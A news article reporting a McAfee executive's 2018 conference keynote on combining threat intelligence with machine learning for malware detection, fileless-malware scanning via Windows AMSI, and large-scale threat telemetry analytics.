Weissblick - Fotolia
“There is an amplification effect, where the net result is better than either one of those technologies working on their own,” he told attendees of the 2018 MPower cyber security summit in Las Vegas.
At the same event in 2017, Grobman said the key to taking advantage of machine learning (ML), artificial intelligence (AI) and data science is understanding how threat defence capabilities work together.
Picking up that theme again a year later, he demonstrated that while threat intelligence alone in a malicious code detection simulation results in very few false positives, not all malicious code is identified.
“Because we are identifying malware based only on what we know to be bad, we have very few false positives. But because threat intelligence only comprehends what we have seen in the past and new threats are constantly being created, we know we are missing some,” he said.
“We essentially hit a ceiling, where the detection rate is only about 90%, which means 10% of malicious samples are being missed.”
In the same simulation using only an AI model, Grobman showed that it was possible to tune a model to achieve a 95% detection rate. “But you pay a huge price. To get the 95% detection rate, you have many more false positives. In this case, 10% of legitimate applications were being classified as malicious,” he said.
“So clearly neither one of these two scenarios is optimal, proving a good outcome, but something amazing happens if you put them together.”
To illustrate his point, Grobman showed that in the same simulation using a combination of threat intelligence and machine learning, where the samples are first classified based on what is known to be good and bad and only the unknowns are sent to the ML model, a much better result is achieved.
“With the same model configured in this way, you get close to a 100% detection rate along with a minimal false positive rate,” he said.
“This demonstrates that it is really not about finding the right technology, it is about figuring out how we can use technologies to provide the best outcome by working together.”
Tracing McAfee’s progress based on its investment in AI, Grobman said the journey started with machine learning on the endpoint in 2016 with Real Protect Static, which uses ML to look at what something is to determine whether it is malicious.
This was followed later that year by Real Protect Dynamic, which looked at looked at application behaviour to determine if it was malicious.
“But what we found in 2018 is that world-class malware detection alone is not enough because so many threats no longer look anything like traditional malware,” said Grobman.
“A new class of threat that the industry is calling ‘fileless malware’ covers a wide range of different scenarios, but essentially uses scripting that can be launched from many different places [such as legitimate tools] like PowerShell.”
In response, Grobman announced McAfee’s third variant of McAfee’s endpoint machine learning technology called Real Protect Fileless.
“We’ve essentially partnered with the [Microsoft] Windows 10 architecture – something called the anti-malware scan interface so that whenever Windows is about to run a script, Windows will call Real Protect Fileless to make an assessment if the script is malicious or not,” he said.
In practice, Grobman said this means that scripts will be assessed regardless of where they are run from and they will be blocked if they are malicious.
“We used ML in this case because we need to be flexible enough to detect malicious things beyond what can be detected with signatures alone,” he said.
To demonstrate the value of this, Grobman showed that while Windows 10 Defender was able to detect a standard version of the Mimikatz PowerShell script used to steal credentials, it was not able to detect an obfuscated version of the script because it is signature-based, while Real Protect Fileless was able to detect both versions of Mimikatz.
Grobman also used his keynote to demonstrate the power of using advanced analytics and telemetry data to produce actionable insights, which McAfee CEO Chris Young has identified as a strategic direction of product development for the company.
“McAfee has an amazing quantity of threat telemetry collected from about a billion sensors across consumer and enterprise installations around the world that see a wide range of technical indicators in networks, web gateways, endpoints and cloud-based operations,” he said.
To make use of all these telemetry, Grobman said McAfee has “built a pipeline” that is able to ingest this data, redact it where required and prepare it to be analysed.
“In five minutes alone, we get 116 million pieces of telemetry that sets the foundation for being able to look at information that ultimately will be able to transform into a capability that will give organisations a different type of visibility into their environment.”
In the same way that the US national hurricane centre is able to translate storm telemetry into a projected path and impact of a hurricane, Grobman said McAfee is working to transform cyber security telemetry to provide insights on which organisations can base a plan of action.
“We want to ensure we are able to provide new ways of thinking about the world and what is happening in organisations and how they intersect. We essentially want to take the raw data out of those billion sensors, combine it with organisation-specific data and transform it using world class analytics capability into information that is actionable,” he said.
To support McAfee’s efforts to deliver insights, Grobman said the company is running a research project to develop a real-time system that provides a global view every second of every day of the threats that are occurring around the world.
“There are so many scenarios that we will be able to look at and then identify which customers will be potentially affected and give them an early warning of what is coming so they can take defensive actions before the proverbial storm hits,” he said.
“We recognise that nation states and cyber criminals continue to up their game, and so must we because we can no longer pretend that the data from a single environment will be sufficient to defend our organisations.
“Future innovation is going to be all about identifying insights from the confluence of data from organisations and a global perspective and then building the next generation of analytics that looks at that type of data to enable a bright future.”